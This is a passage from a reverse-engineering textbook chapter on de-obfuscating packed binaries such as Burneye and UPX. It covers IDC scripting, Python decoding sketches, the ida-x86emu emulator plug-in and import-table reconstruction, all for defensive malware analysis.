There are two minor points to raise with this example. First, the right shift operator (>>) in IDC performs signed shifts (meaning that the sign bit is replicated into the most significant bit), while the x86 shr and shrd instructions perform unsigned shifts. In order to emulate an unsigned right shift in IDC, we must clear all bits that have been shifted in from the left, as is done at ➊ and ➋. The second point involves the choice of an appropriate data size and variable to properly implement the x86 lodsb (load string byte) and stosb (store string byte) instructions. These instructions write to (lodsb) and read from (stosb) the low-order 8 bits of the EAX register,31 leaving the upper 24 bits unchanged. In IDC, there is no way to partition a variable into bit-sized portions other than using various bitwise operations to mask off and recombine portions of the variable. Specifically, in the case of the lodsb instruction, a more faithful emulation would read as follows:

eax = (eax & 0xFFFFFF00) | (Byte(esi++) & 0xFF);

This example first clears the low 8 bits of the EAX variable and then merges in the new value for the low 8 bits using an OR operation. In the Burneye decoding example, we make note of the fact that the entire EAX register is set to 8 at the start of each outer loop iteration and is then counted down to 0 by the inner loop, which has the effect of zeroing the upper 24 bits of EAX. As a result, we have elected to simplify our implementation of lodsb ➌ by ignoring the effect of the assignment on the upper 24 bits of EAX. No thought need be given to our implementation of stosb ➍, as the PatchByte function reads only from the low-order 8 bits of its input value (EAX in this case).
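Both points can be checked outside IDA. The Python sketch below models a signed 32-bit right shift, as the text describes for IDC's >> operator, and then derives the unsigned shift and the partial-register write from it. The helper names (sar32, shr32, lodsb) are illustrative, and the model assumes 32-bit values throughout.

```python
MASK32 = 0xFFFFFFFF


def to_signed32(value):
    """Reinterpret the low 32 bits of value as a signed integer."""
    value &= MASK32
    return value - 0x100000000 if value & 0x80000000 else value


def sar32(value, count):
    """Signed shift right: the sign bit is replicated from the left."""
    return (to_signed32(value) >> count) & MASK32


def shr32(value, count):
    """Unsigned shift right, built by clearing the shifted-in bits."""
    return sar32(value, count) & (MASK32 >> count)


def lodsb(eax, byte):
    """Replace only the low 8 bits (AL) of eax, keeping the upper 24 bits."""
    return (eax & 0xFFFFFF00) | (byte & 0xFF)
```

The mask MASK32 >> count generalizes the constants 0x7FFFFFFF (shift by 1) and 0xFF (shift by 24) used in the IDC script.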

Following execution of the Burneye decoding IDC script, our database

would reflect all of the changes that would normally not be observable until

the obfuscated program was executed on a Linux system. If the de-obfuscation

process was carried out properly, we are very likely to see many more legible

strings within IDA’s Strings window. In order to observe this fact, you may

need to refresh the Strings window content by closing and reopening the

window or by right-clicking within the window, selecting Setup, and then

clicking OK. Either action causes IDA to rescan the database for string content.
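For experimentation outside IDA, the decoding loop from Listing 21-3 can also be expressed as a standalone Python function that works on a byte string rather than on the database. This is a sketch under a few assumptions: the key parameter stands in for the value read from dword_5371004, the length of data stands in for the byte count held in ECX, and the function name is made up for this example.

```python
def burneye_decode(data, key):
    """Apply the Listing 21-3 keystream to data and return the result."""
    out = bytearray(data)
    ebx = key & 0xFFFFFFFF
    if ebx == 0:                    # or ebx, ebx / jz: nothing to decode
        return bytes(out)
    edx = 0                         # xor edx, edx
    for i in range(len(out)):       # outer loop, counted by ecx
        for _ in range(8):          # inner loop, counted by eax
            cf = ebx & 1            # bit shifted out of ebx
            edx = (edx >> 1) | (cf << 31)   # shrd edx, ebx, 1
            ebx >>= 1               # shr ebx, 1
            if cf:                  # jnb skips the xor when cf is clear
                ebx ^= 0xC0000057
        edx >>= 24                  # shr edx, 18h
        out[i] ^= edx               # lodsb / xor al, dl / stosb
    return bytes(out)
```

Python integers are unbounded and never negative here, so no masking is needed to obtain unsigned shifts. Because each byte is simply XORed with a keystream byte, applying the function twice with the same key returns the original data.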

31. The low-order 8 bits of the EAX register are also referred to as the AL register.

Remaining tasks include determining where the decoding function will return, given that it popped its return address in the very first instruction of the function, along with coaxing IDA to properly display the decoded byte values as instructions or data as appropriate. The Burneye decoding function ends with the following three instructions:

LOAD:0537107F popa

LOAD:05371080 popf

LOAD:05371081 retn

Recall that the function began by popping its own return address, which

means that the remaining stack values were set up by the caller. The popa

and popf instructions used here are the counterparts to the pusha and pushf

instructions used at the beginning of Burneye’s start routine, as shown here:

  LOAD:05371035 start proc near
  LOAD:05371035
➊ LOAD:05371035         push    off_5371008
  LOAD:0537103B         pushf
  LOAD:0537103C         pusha

The net result is that the only value that remains on the stack is the one that was pushed at the first line of start ➊. It is to this location that the Burneye decoding routine returns, and it is at this location that further analysis of the Burneye protected binary would need to continue.
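The stack bookkeeping behind this conclusion can be replayed with a simple list. In the Python sketch below, the function name and the placeholder strings are illustrative, and pushed_value stands for whatever is stored at off_5371008, which is not shown in the listings.

```python
def trace_return_target(pushed_value, call_return_addr):
    """Replay the stack effects of start and sub_5371048.

    Returns (value popped into esi, address retn transfers to, items left).
    """
    stack = []
    stack.append(pushed_value)        # push off_5371008
    stack.append("eflags")            # pushf
    stack.extend(["reg"] * 8)         # pusha saves eight registers
    stack.append(call_return_addr)    # call sub_5371048
    esi = stack.pop()                 # pop esi
    del stack[-8:]                    # popa
    stack.pop()                       # popf
    target = stack.pop()              # retn
    return esi, target, len(stack)
```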

The preceding example may make it seem like writing a script to decode

or unpack an obfuscated binary is a relatively easy thing to do. This is true in

the case of Burneye, which does not use a terribly sophisticated initial obfusca-

tion algorithm. The de-obfuscation stub of more sophisticated utilities such

as ASPack and tElock would require somewhat more effort to implement

using IDC.

Advantages to script-based de-obfuscation include the fact that the binary

being analyzed need never be executed and that it is possible to create a

functional script without ever developing a complete understanding of the

exact algorithm used to de-obfuscate the binary. This latter statement may

seem counterintuitive, as it would seem that you would need to have a com-

plete understanding of the de-obfuscation before you could emulate the

algorithm using a script. Using the development process described here and

in Chapter 15, however, all you really need is a complete understanding of

each CPU instruction involved in the de-obfuscation process. By faithfully

implementing each CPU action using IDC and properly sequencing each

action according to the disassembly listing, you will have a script that mimics

the program’s actions even if you do not fully comprehend the higher-level

algorithm that those actions, as a whole, implement.

Disadvantages of using a script-based approach include the fact that the scripts are rather fragile. If a de-obfuscation algorithm changes as a result of an upgrade to an obfuscation tool or through the use of alternate command-line settings supplied to the obfuscation tool, it is quite likely that a script that had been effective against that tool will need to be modified accordingly. For example, it is possible to develop a generic unpacking script for use with binaries packed using UPX,32 but such a script requires constant tuning as UPX evolves.

Finally, scripted de-obfuscation suffers from the lack of a one-size-fits-all

solution to de-obfuscation. There is no megascript capable of de-obfuscating

all binaries. In a sense, scripted de-obfuscation suffers from many of the same

shortcomings as signature-based intrusion-detection and antivirus systems. A

new script must be developed for each new type of packer, and subtle changes

in existing packers are likely to break existing scripts.

Emulation-Oriented De-obfuscation

A recurring theme encountered when creating scripts to perform de-

obfuscation tasks is the need to emulate a CPU’s instruction set so the script

behaves identically to the program being de-obfuscated. If we had an actual

instruction emulator at our disposal, it might be possible to shift some or

all of the work performed by these scripts over to the emulator and drastically

reduce the amount of time required to de-obfuscate an IDA database. Emula-

tors can fill the void between scripts and debuggers and have the advantage

of being both more efficient than scripts and more flexible than debuggers.

Using emulators, for example, it is possible to emulate a MIPS binary on

an x86 platform or to emulate instructions from a Linux ELF binary on a

Windows platform.

Emulators vary in sophistication. At a minimum, an emulator requires a

stream of instruction bytes and sufficient memory to dedicate to stack opera-

tions and CPU registers. More sophisticated emulators may provide access to

emulated hardware devices and operating system services.

IDA does not offer a native emulation facility,33 but its plug-in architecture is sophisticated enough to allow for the creation of emulator-type plug-ins. One possible implementation of such an emulator treats the IDA database as virtual memory that happens to contain the mapped binary we wish to emulate (courtesy of a loader module). All that is required of an emulator plug-in is to provide a small amount of memory to track the state of all CPU registers and some means to implement a stack. One approach implements a stack by creating a new segment within the database mapped to a location suitable for a stack. The emulator operates by reading bytes from the database location specified by the current value of the emulator’s instruction pointer, decoding the retrieved values according to the emulated CPU’s instruction set specification, and updating any memory values affected by the decoded instruction. Possible updates might include modifying emulated register values, storing values into the emulated stack memory space, or patching modified values into the data or code sections within the IDA database as dictated by memory addresses generated by the decoded instruction. Control of the emulator could be similar to control of a debugger in that instructions could be stepped through, memory could be examined, registers could be modified, and breakpoints could be set. Memory contents within the program memory space would be displayed courtesy of IDA’s disassembly and hex views, while the emulator would be required to generate its own displays for the CPU registers.

32. See http://www.idabook.com/examples/chapter21/ for one such example.

33. IDA does ship with a plug-in capable of interfacing with the open source Bochs emulator via IDA’s debugging interface. Please refer to Chapters 24 through 26 for more information.

Using such an emulator, an obfuscated program may be de-obfuscated

by initiating emulation at the program entry point and stepping through

the instructions that constitute the de-obfuscation phase of the program.

Because the emulator utilizes the database as its backing memory, all self-

modifications are reflected immediately as changes in the database. By the

time the de-obfuscation routine has completed, the database has been trans-

formed into the correct de-obfuscated version of the program, just as if the

program had been running under debugger control. An immediate advan-

tage of emulation over debugging is that potentially malicious code is never

actually executed by an emulator, whereas debugger-assisted de-obfuscation

must allow at least some portion of the malicious program to execute in

order to obtain the de-obfuscated version of the program.
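As a rough sketch of why using the database as backing memory matters, the following Python fragment stands in for an emulated decoding loop. The single-byte XOR scheme and the key are hypothetical (Burneye's actual algorithm is different); the point is only that each emulated store lands directly in the bytes that the disassembler displays.

```python
def run_decoder(db, start, length, key):
    """Stand-in for emulating an XOR decoding loop: each emulated store
    writes straight back into the database bytes."""
    for addr in range(start, start + length):
        db[addr] ^= key

# x86 encodings of: pushf; pop ebx; mov esi, esp
plain = b"\x9c\x5b\x89\xe6"

# Hypothetical obfuscated image: 4 filler bytes, then the encoded code.
db = bytearray(b"\x00" * 4 + bytes(b ^ 0x5A for b in plain))
run_decoder(db, 4, len(plain), 0x5A)
```

After the loop finishes, the bytes at offset 4 are the original instructions, ready to be reformatted as code.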

The ida-x86emu (x86emu) plug-in is an example of an emulator plug-in

that is designed to offer emulation of the x86 instruction set. The plug-in is

open source and builds with all versions of the IDA SDK from 4.9 onward.

Binary versions of the plug-in compiled for all versions of IDA are included

with the x86emu distribution. The plug-in is designed for use with either the

Windows GUI version or the Qt version of IDA and includes build scripts,

which allow the plug-in to be built using either MinGW (g++/make) or

Microsoft (Visual Studio 2008) tools. The Qt version of the plug-in is also

compatible with the Linux and OS X versions of IDA. Apart from the appropriate

SDK for your version of IDA, the plug-in has no dependencies.

The plug-in is installed by copying the compiled plug-in binary (x86emu.plw/

x86emu_qt.plw) into <IDADIR>/plugins.

No plug-in configuration is required, and the emulator is activated using

the ALT-F8 key sequence by default. The plug-in may be activated only for

binaries that make use of the x86 processor, and the plug-in may be used

with binaries of any file type, such as PE, ELF, and Mach-O. The plug-in may

be built from source using the tools (Visual Studio or MinGW’s gcc and make)

discussed in Chapter 17.

Name: ida-x86emu

Author: Chris Eagle

Distribution: Source for SDK v6.1 and binaries for all versions of IDA from 5.0, including IDA Freeware. Source is backward compatible to SDK version 4.9.

Price: Free

Description: Embedded x86 instruction emulator for IDA

Information: http://www.idabook.com/ida-x86emu/


x86emu Initialization

When the x86emu plug-in is activated, the plug-in control dialog shown in

Figure 21-4 is displayed. The basic display shows register values and provides

button controls used to perform simple emulation tasks such as stepping the

emulator or modifying data values.

Figure 21-4: x86emu emulator control dialog

Upon initial activation, the plug-in carries out a number of additional

actions. For all file types, the emulator creates new database segments named

.stack and .heap in order to provide runtime memory support for emulated

program operations. The first time the plug-in is activated within a particular

binary, the current cursor location is used to initialize the instruction pointer

(EIP). For Windows PE binaries, the plug-in performs the following additional

tasks:

1. Creates an additional program segment named .headers, rereads the

input binary file, and then loads the MS-DOS and PE header bytes into

the database.

2. Allocates memory to emulate a thread environment block (TEB) and a

process environment block (PEB). These structures are populated with

reasonable values in an attempt to convince the program being emulated

that it is running within an actual Windows environment.

3. Assigns reasonable values to the x86 segment registers and configures a

fake interrupt descriptor table in order to provide a minimal exception-

handling capability.

4. Attempts to locate all DLLs referenced in the PE file’s import directory.

For each such DLL that is found, the emulator creates additional segments

within the database and loads the DLL’s headers and export directory.

The binary’s import table is then populated with function addresses

derived from the loaded DLL information. Note that no code from any

of the imported DLLs is loaded into the database.
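The address arithmetic behind step 4 can be sketched as follows. The function name and dictionaries are hypothetical, and the RVAs are simply the differences between the KERNEL32.DLL base address and the function addresses that appear in the emulator output shown later in this chapter; this is not the plug-in's actual code.

```python
def populate_imports(import_names, dll_base, export_rvas):
    """Map each imported name to dll_base + RVA; unresolved names are skipped."""
    return {
        name: dll_base + export_rvas[name]
        for name in import_names
        if name in export_rvas
    }

# Illustrative values only.
export_rvas = {"ExitProcess": 0x1CDDA, "ExitThread": 0xC058}
table = populate_imports(["ExitProcess", "ExitThread", "NoSuchExport"],
                         0x7C800000, export_rvas)
```

Only the export directory is needed for this computation, which is consistent with the note that no DLL code is loaded.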

The current state of the plug-in (register values) is saved in a netnode

each time the database is saved or closed. Additional memory state such as

stack and heap values is saved as well because these values are stored within

dedicated segments in the database. Upon subsequent activation, the emulator

state is restored from existing netnode data.


Basic x86emu Operation

The emulator control dialog is intended to provide capabilities similar to

those of a very basic debugger. CPU register contents may be altered by

entering a new value into the desired register’s edit box.

The Step button is used to emulate a single instruction. A single instruc-

tion is emulated by reading one or more bytes from the database location

specified by the EIP register and carrying out any actions specified by the

instruction bytes. Where required, register display values are updated to

reflect changes resulting from the emulation of the current instruction.

Each time the Step button is clicked, the emulator ensures that the bytes at

the address specified by EIP are displayed as code (rather than data). This

feature helps defeat any desynchronization attempts that may occur within

the instruction stream. In addition, the emulator jumps the disassembly dis-

play window to the location specified by EIP so that the display tracks along

with each emulated instruction.

The Run To Cursor button may be used to emulate an entire sequence

of instructions at one time. Emulation continues from the current EIP loca-

tion and does not stop until a breakpoint is reached or EIP is equal to the

current cursor location. The emulator recognizes breakpoints set via IDA’s

debugger interface (right-click the desired address and select Add breakpoint)

or breakpoints set via the emulator’s own breakpoint interface,

Emulate▸Set Breakpoint.

Once Run To Cursor has been selected, the emulator does not pause to

reformat the disassembly for each fetched instruction; instead it formats only

the first and last instructions executed. For long instruction sequences, the

overhead associated with reformatting the disassembly at each instruction

would result in intolerably slow performance of the emulator. You should use

the Run To Cursor command very carefully, as control of the emulator (and

IDA) will not be regained until EIP reaches the cursor location. If, for any

reason, execution never hits a breakpoint or fails to reach the cursor loca-

tion, you may be required to forcibly terminate IDA, potentially losing valu-

able work.
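The control flow of a run-until-stopped command might look something like the following sketch. The `step` callback, the register dictionary, and in particular the `max_steps` safety limit are assumptions made for this example; the text above describes no such limit in x86emu, which is exactly why the command must be used with care.

```python
def run_to(step, regs, target, breakpoints=(), max_steps=100_000):
    """Step until regs['eip'] reaches `target` or a breakpoint.

    Returns the reason emulation stopped. `max_steps` is a safety limit
    added for this sketch only.
    """
    stops = set(breakpoints)
    for executed in range(max_steps):
        eip = regs["eip"]
        # Compare the instruction pointer before emulating each instruction,
        # but let the very first instruction run so that emulation can
        # resume from an address that is itself a breakpoint.
        if executed:
            if eip == target:
                return "cursor"
            if eip in stops:
                return "breakpoint"
        step(regs)
    return "step limit"

def fake_step(regs):
    """Placeholder for real instruction emulation: advance eip by one."""
    regs["eip"] += 1
```

For example, `run_to(fake_step, {"eip": 0x1000}, 0x1005, breakpoints={0x1003})` stops at the breakpoint before the cursor address is reached.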

x86EMU BREAKPOINTS

The emulator does not make use of hardware debug registers or software interrupts

such as the int 3 instruction. Instead, the emulator maintains an internal list of

breakpoints against which the emulated instruction pointer is compared prior to

emulating each instruction. While this may seem inefficient, it is no more inefficient

than emulation in general, and it offers the advantage that emulator breakpoints are

undetectable, and unalterable, by the program being emulated.

The Skip button is used to advance the emulator by exactly one instruction

without emulating that instruction. One potential use of the Skip command

is to skip over a conditional jump in order to reach a specific block

of code regardless of the state of any condition flags. Skip is also useful for

skipping over calls to imported library functions whose code is not available

for emulation. Should you elect to skip over a function call, make certain

that you update the database to reflect any changes that the function would

have made. Examples of such changes include modifying the value of EAX

to reflect the desired function return value or populating a buffer whose

address was passed to the function. Additionally, if the skipped function uses

the stdcall calling convention, you should also be careful to manually adjust

ESP according to the number of bytes that the skipped function would have

cleared from the stack upon return.
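The manual bookkeeping described above amounts to a small amount of arithmetic, sketched here in Python. The function and the register dictionary are hypothetical; the sketch assumes 4-byte stack arguments that have already been pushed and a call instruction that was skipped, so no return address was ever pushed.

```python
def skip_stdcall_call(regs, call_length, arg_count, return_value):
    """Mimic the visible effects of a skipped stdcall function call.

    Assumes 4-byte stack arguments that were already pushed, and that the
    call instruction itself was never emulated (no return address pushed).
    """
    regs["eip"] += call_length                    # what the Skip button does
    regs["eax"] = return_value & 0xFFFFFFFF       # desired return value
    regs["esp"] = (regs["esp"] + 4 * arg_count) & 0xFFFFFFFF  # callee cleanup
    return regs

# A 6-byte indirect call taking two arguments and returning 1.
regs = {"eip": 0x00408882, "eax": 0, "esp": 0x0012FF70}
skip_stdcall_call(regs, call_length=6, arg_count=2, return_value=1)
```

For a cdecl function the stack adjustment would be omitted, because the caller's own instructions remove the arguments.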

The Jump To Cursor button causes EIP to be updated with the address of

the current cursor location. This feature may be used to skip entire sections

of code or to follow a conditional jump when the state of the CPU flags may

not cause the jump to be taken otherwise. Keep in mind that jumping around

within a function may have consequences on stack layout (if you skip over

a push or stack pointer adjustment, for example), resulting in unexpected

behaviors. Note that it is not necessarily the intention of the emulator that

emulation begins with the entry point of a program. It is entirely possible

to use the emulator to emulate a single function within a binary in order to

study the behavior of that function. This is one of the motivations behind

the inclusion of the Jump To Cursor button, to allow easy redirection of your

emulation efforts within a binary.

The Run button is similar in functionality to the Run To Cursor button;

however, it is more dangerous in that execution continues until a breakpoint

is reached. You should be absolutely certain that one of your breakpoints will

be reached if you elect to use this command.

The Segments button provides access to configuration for x86 segment

registers and segment base addresses. Figure 21-5 shows the resulting dialog

used to alter segment-related values.

Figure 21-5: x86emu segment register configuration

While the emulator’s address computations honor the supplied base

values, the emulator does not currently provide a complete emulation of

the x86 global descriptor table (GDT).

The Set Memory button provides access to a basic memory modification

dialog, as shown in Figure 21-6.


Figure 21-6: x86emu memory modification dialog

This dialog is essentially a wrapper around some of the SDK PatchXXX

functions. The type of data to be inserted into the database is selected via

the provided radio buttons, while the actual data is entered into the pro-

vided edit control. If the Load from file radio button is selected, the user is

presented with a standard file-open dialog to select a file whose content is

transferred into the database beginning at the specified address.

The Push Data button is used to place data values onto the top of the

emulated program stack. The resulting dialog, shown in Figure 21-7, may be

used to specify one or more data items that will be pushed onto the stack.

Figure 21-7: x86emu stack data dialog

The emulator currently accepts only numeric data. Supplied values are

pushed, as 4-byte quantities, onto the emulation stack in right-to-left order as

if they were parameters to a function call. The value of the stack pointer is

adjusted according to the number of values pushed onto the stack. The

intended use of this dialog is to configure function parameters prior to jump-

ing directly to the function to be emulated. This allows a function to be

emulated without requiring users to find an actual execution path to the

function.
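The right-to-left push order can be illustrated with a short Python sketch. The `push_values` helper and the dictionary standing in for the stack segment are assumptions made for the example, not part of the plug-in.

```python
import struct

def push_values(stack, esp, values):
    """Push 32-bit values right to left; return the new stack pointer.

    `stack` maps addresses to bytes, standing in for the .stack segment.
    """
    for value in reversed(values):
        esp -= 4
        # Store each value as a little-endian 4-byte quantity.
        for offset, byte in enumerate(struct.pack("<I", value & 0xFFFFFFFF)):
            stack[esp + offset] = byte
    return esp

stack = {}
esp = push_values(stack, 0x0012FFF0, [0x11111111, 0x22222222, 0x33333333])
```

Pushing the last value first leaves the first value at the lowest address, which is where a function expects to find its first stack argument.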

Emulator-Assisted De-obfuscation

At this point we are ready to discuss the use of x86emu as a de-obfuscation

tool. We begin by returning to the Burneye example for which we developed

an entire IDC script. Assuming that we have no prior knowledge of the

Burneye decoding algorithm, de-obfuscation would proceed as follows.

1. Open the Burneye protected binary. The cursor should be automatically

positioned at the start entry point. Activate the emulator (ALT-F8). Fig-

ure 21-4 shows the resulting state of the emulator.


2. Begin stepping the emulator, paying close attention to the instructions

that are about to be emulated. After six steps, the emulator arrives at

function sub_5371048 (see Listing 21-3).

3. This function appears to be fairly well structured. We could choose to

step the emulator for a while to obtain a better sense of the flow of exe-

cution, or we could choose to study the function for a while and deter-

mine if it is safe to position the cursor at the function’s return statement

and click Run To Cursor. Opting for the latter, we position the cursor at

address 05371081h and click Run To Cursor.

4. At this point the de-obfuscation is complete. Stepping the emulator

two more times executes the return statement, returning to the newly

de-obfuscated code, and causes IDA to reformat the de-obfuscated bytes

as instructions.

The resulting de-obfuscated code is shown here:

LOAD:05371082 loc_5371082: ; CODE XREF: start+E↑j

LOAD:05371082 call sub_5371048

LOAD:05371082 ; --------------------------------------------------------------

LOAD:05371087 db 0

LOAD:05371088 db 0

LOAD:05371089 db 0

LOAD:0537108A db 0

LOAD:0537108B db 0

LOAD:0537108C db 0

LOAD:0537108D db 0

LOAD:0537108E db 0

LOAD:0537108F db 0

LOAD:05371090 ; --------------------------------------------------------------

LOAD:05371090

LOAD:05371090 loc_5371090: ; DATA XREF: LOAD:off_5371008↑o

➊ LOAD:05371090 pushf

LOAD:05371091 pop ebx

LOAD:05371092 mov esi, esp

LOAD:05371094 call sub_5371117

LOAD:05371099 mov ebp, edx

LOAD:0537109B cmp ecx, 20h

LOAD:0537109E jl loc_53710AB

LOAD:053710A4 xor eax, eax

LOAD:053710A6 jmp loc_53710B5

Comparing this listing to that of Listing 21-2, it is clear that the instructions

have changed as a result of the de-obfuscation process. Following the

initial de-obfuscation, execution of the program resumes with the pushf

instruction ➊ at loc_5371090.

Emulator-assisted de-obfuscation is clearly easier than the script-oriented

de-obfuscation process followed earlier. Time spent developing the emulator

approach pays off with a highly flexible de-obfuscation alternative, whereas

time spent developing a Burneye-specific script pays off in a very specialized

script that is of little use in other de-obfuscation scenarios.


Note that while the Burneye-protected binary in the previous example

was a Linux ELF binary, x86emu has no problems emulating the instructions

within the binary because they are all x86 instructions, regardless of the

operating system and file type that they were taken from. x86emu can be

used just as easily on a Windows PE binary, such as the UPX example discussed

earlier in this chapter. Because the overwhelming majority of

obfuscated malware in existence today is targeted at the Windows platform,

x86emu contains many features specific to Windows PE binaries (as detailed

earlier).

Using the emulator to uncompress a UPX binary is very straightforward.

The emulator should be launched with the cursor positioned on the program

entry point (start). Next, the cursor can be moved to the first instruction of

the UPX import table rebuilding loops (address 0040886Ch in Listing 21-1),

and the emulator can be allowed to run using the Run To Cursor command.

At this point, the binary has been unpacked, and the Strings window can be

used to view all of the unpacked library and function names that will be used

by UPX to build the program’s import tables. If the emulator is stepped

through the code of Listing 21-1, the following function call will eventually

be encountered:

UPX1:00408882 call dword ptr [esi+808Ch]

Instructions of this sort can be dangerous to emulate, as it is not imme-

diately apparent where the instruction may lead (meaning that the destina-

tion address of the call instruction is not obvious). In general, function calls

can lead to one of two places: a function within the program’s code (.text)

segment or a function within a shared library being used by the program.

Whenever a call instruction is encountered, the emulator determines whether

the target address lies within the virtual address space of the file being analyzed

or whether the target address correlates to a function that is being exported

by one of the libraries that the binary has loaded. Recall that for PE binaries

the emulator loads the export directories of all libraries loaded by the binary

being analyzed. When the emulator determines that the target address of a

call instruction lies outside the bounds of the binary, the emulator scans the

export tables that were loaded into the database in order to determine which

library function is being called. For Windows PE files, the emulator contains

emulated implementations of the functions listed in Table 21-1.

When the emulator determines that one of these functions has been

called, it reads any parameters from the program stack and either carries out

the same actions that the actual function would carry out if the program were

actually running or performs some minimal action and generates a return

value that will appear to be correct from the perspective of the emulated

program. In the case of stdcall functions, the emulator properly removes

any stack arguments prior to completing the emulated function.


Emulated behavior for the heap-related functions causes the emulator

to manipulate its internal heap implementation (backed by the .heap section)

and return a value appropriate to the function being emulated. For example,

the value returned by the emulated version of HeapAlloc is an address that

is suitable for the emulated program to write data to. When the emulated

version of VirtualAlloc is called, a new section is created in the database to

represent the newly mapped virtual address space. The emulated version of

IsDebuggerPresent always returns false. When emulating LoadLibraryA, the emu-

lator extracts the name of the library being loaded by examining the stack

arguments provided to LoadLibraryA. The emulator then attempts to open the

named library on the local system so that library’s export table can be loaded

into the database, and an appropriate library handle34 value is returned to

the caller. When a call to GetProcAddress is intercepted, the emulator exam-

ines arguments on the stack to determine which shared library is being refer-

enced; then the emulator parses the library’s export table in order to compute

the proper memory address of the requested function, which is then returned

to the caller. Calls to LoadLibraryA and GetProcAddress are noted in the IDA

Output window.
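One way to picture the handling of an intercepted stdcall library function is the sketch below. It assumes that the call instruction has already pushed a return address, so the stack holds the return address followed by the arguments. The helper names, the flat `bytearray` memory, and the bump allocator are all hypothetical stand-ins rather than the plug-in's real implementation.

```python
import struct

def read_dword(mem, addr):
    """Read a little-endian 32-bit value from the emulated memory."""
    return struct.unpack_from("<I", mem, addr)[0]

def emulate_stdcall(mem, regs, handler, arg_count):
    """Emulate a library call whose return address is at [esp].

    Reads `arg_count` dword arguments, stores the handler's result in eax,
    then returns to the caller and removes the arguments (stdcall cleanup).
    """
    esp = regs["esp"]
    return_address = read_dword(mem, esp)
    args = [read_dword(mem, esp + 4 + 4 * i) for i in range(arg_count)]
    regs["eax"] = handler(*args) & 0xFFFFFFFF
    regs["eip"] = return_address
    regs["esp"] = esp + 4 + 4 * arg_count

def is_debugger_present():
    """Always report that no debugger is attached."""
    return 0

class ToyHeap:
    """Bump allocator standing in for the emulator's .heap management."""

    def __init__(self, base):
        self.next_free = base

    def heap_alloc(self, heap_handle, flags, size):
        address = self.next_free
        self.next_free += (size + 3) & ~3   # keep blocks 4-byte aligned
        return address
```

A dispatcher built on this idea would look up the handler and argument count by function name once the call target has been matched against the loaded export tables.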

When a function for which x86emu has no internal emulation is called, a

dialog similar to the one shown in Figure 21-8 is displayed.

Knowing the name of the function being called, the emulator queries

IDA’s type library information to obtain the number and types of parameters

required by the function. The emulator then digs into the program stack to

display all of the arguments that have been passed to the function, along with

the type of the argument and the formal parameter name of the argument.

Argument types and names are displayed only when type information is

available from IDA. The dialog also offers the user a chance to specify a return

value, as well as the opportunity to specify the calling convention used by the

function (this information may be available from IDA). When the stdcall

calling convention is selected, the user should indicate how many arguments

(not bytes) should be removed from the stack when the call completes. This

information is required in order for the emulator to maintain the integrity of

the execution stack across emulated function calls.

Table 21-1: Functions Emulated by x86emu

CheckRemoteDebuggerPresent  GetTickCount       LocalFree                  VirtualAlloc
CreateThread                GetVersion         NtQuerySystemInformation   VirtualFree
GetCurrentThreadId          HeapAlloc          NtQueryInformationProcess  calloc
GetCurrentProcess           HeapCreate         NtSetInformationThread     free
GetCurrentProcessId         HeapDestroy        RtlAllocateHeap            lstrcat
GetModuleHandleA            HeapFree           TlsAlloc                   lstrcpy
GetProcAddress              IsDebuggerPresent  TlsFree                    lstrlen
GetProcessHeap              LoadLibraryA       TlsGetValue                malloc
GetThreadContext            LocalAlloc         TlsSetValue                realloc

34. A Windows library handle uniquely identifies a library within a Windows process. A library

handle is actually the base address at which the library is loaded into memory.


Figure 21-8: x86emu library function dialog

Returning to the UPX de-obfuscation example, and allowing the emulator

to complete the import table reconstruction loops, we would find that the

emulator generates output such as the following in IDA’s Output window:

x86emu: LoadLibrary called: KERNEL32.DLL (7C800000)

x86emu: GetProcAddress called: ExitProcess (0x7C81CDDA)

x86emu: GetProcAddress called: ExitThread (0x7C80C058)

x86emu: GetProcAddress called: GetCurrentProcess (0x7C80DDF5)

x86emu: GetProcAddress called: GetCurrentThread (0x7C8098EB)

x86emu: GetProcAddress called: GetFileSize (0x7C810A77)

x86emu: GetProcAddress called: GetModuleHandleA (0x7C80B6A1)

x86emu: GetProcAddress called: CloseHandle (0x7C809B47)

This output provides a record of the libraries that the obfuscated binary is

loading and the functions within those libraries that the obfuscated program

is resolving.35 When function addresses are looked up in this manner, they

are often saved in an array (this array is the program’s import table) for

later use.

A fundamental problem with de-obfuscated programs is that they lack

the symbol table information that is usually present in un-obfuscated binaries.

When a binary’s import table is intact, IDA’s PE loader names each entry in

the import table according to the name of the function whose address it

will contain at runtime. When an obfuscated binary is encountered, it is use-

ful to apply function names to each location in which a function address is

stored. In the case of UPX, the following lines from Listing 21-1 show how

function addresses are saved into memory with each pass through the func-

tion lookup loop:

UPX1:00408897 call dword ptr [esi+8090h] ; GetProcAddress

UPX1:0040889D or eax, eax

UPX1:0040889F jz short loc_4088A8

35. Once a program has used GetProcAddress to find the address of a function, the program may

call that function anytime it wishes using the returned address. Looking up function addresses

in this manner eliminates the need to explicitly link to the functions at build time and reduces

the amount of information that can be extracted by static analysis tools such as dumpbin.


➊ UPX1:004088A1 mov [ebx], eax ; Save to import table

UPX1:004088A3 add ebx, 4

The instruction at address 004088A1h ➊ is responsible for storing function

addresses into the import table as it is reconstructed. x86emu provides an

automated facility for naming each import table entry provided that an instruc-

tion such as this can be identified. The emulator terms such an instruction

an import address save point, and you may designate an address as such using

the EmulateWindowsSet Import Address Save Point menu option. This

designation must be made before the instruction is emulated in order for

this functionality to work. Following designation, each time the instruction is

emulated, the emulator will perform a lookup to determine what function

is referenced by the data being written and then name the address being

written using the name of the imported function. In the UPX example,

making no effort to clean up the import table would yield the (partial)

import table shown here:

UPX0:00406270 dd 7C81CDDAh

UPX0:00406274 dd 7C80C058h

UPX0:00406278 dd 7C80DDF5h

UPX0:0040627C dd 7C8098EBh

However, the automated naming that is performed when an import

address save point is designated yields the following automatically generated

(partial) import table.

UPX0:00406270 ; void __stdcall ExitProcess(UINT uExitCode)

UPX0:00406270 ExitProcess dd 7C81CDDAh ; DATA XREF: j_ExitProcess↑r

UPX0:00406274 ; void __stdcall ExitThread(DWORD dwExitCode)

UPX0:00406274 ExitThread dd 7C80C058h ; DATA XREF: j_ExitThread↑r

UPX0:00406278 ; HANDLE __stdcall GetCurrentProcess()

UPX0:00406278 GetCurrentProcess dd 7C80DDF5h ; DATA XREF: j_GetCurrentProcess↑r

UPX0:0040627C ; HANDLE __stdcall GetCurrentThread()

UPX0:0040627C GetCurrentThread dd 7C8098EBh ; DATA XREF: j_GetCurrentThread↑r

With the import table reconstructed in this manner, IDA is able to

properly annotate calls to library functions using parameter-type information

extracted from its type libraries, and the overall quality of the disassembly is

significantly enhanced.
